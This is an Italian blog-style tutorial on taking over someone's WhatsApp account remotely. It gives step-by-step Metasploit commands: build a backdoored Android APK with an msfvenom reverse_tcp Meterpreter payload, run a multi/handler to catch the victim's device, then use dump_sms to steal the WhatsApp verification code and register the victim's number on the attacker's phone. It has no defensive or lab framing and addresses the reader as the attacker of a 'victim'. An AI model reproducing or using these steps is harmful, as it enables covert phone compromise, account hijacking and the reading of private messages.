Come hackerare WhatsApp a distanza 2019

Molti di voi hanno digitato questa frase su google per diversi motivi, ma il punto della questione è che non esistono metodi per hackerare whatsapp direttamente, ma è possibile farlo sfruttando altre vulnerabilità.

Per fare ciò, oggi sfrutteremo l'hacking di un cellulare tramite Metasploit.

Risultati immagini per whatsapp

 

 

PRIMA DI INIZIARE, VUOI SAPERNE DI PIU' SULL'HACKING?

TI CONSIGLIO UN LIBRO CHE TI PERMETTERA' DI IMPARARE QUESTA BELLISSIMA ARTE SENZA SEGUIRE TUTORIAL PASSO PER PASSO!

  • 1) Creazione della backdoor

iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk

Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.

 

2)Impostare L'handler

Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android

 

  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST [ip_macchina_attaccante]
  • set LPORT [porta_per_la_connessione]

3)Lanciare l'exploit e collegarsi al dispositivo

 

lanciamo il nostro exploit digitando

 

  • exploit

e installiamo l'apk infetto sul dispositivo.

una volta fatto digitiamo

  • sessions -l
  • sessions -i [numero sessione]
4)Hackerare WhatsApp
Ora dal nostro cellulare, installiamo WhatsApp (disistallandolo se è già presente) e iscriviamoci alla piattaforma con il numero della vittima.
Quando WhatsApp attende la conferma del numero di telefono (mandando un codice per messaggio), digita dal terminale
  •  dump_sms
Ora selezioniamo il messaggio di conferma inviato da WhatsApp e trascriviamo il codice inviato sul nostro telefono.
5)Successo!
Ora avrai sul tuo telefono l'esatta copia dell'ultimo backup di WhatsApp della vittima. 
Potrai ricevere e scrivere messaggi, cambiare lo stato e chiamare.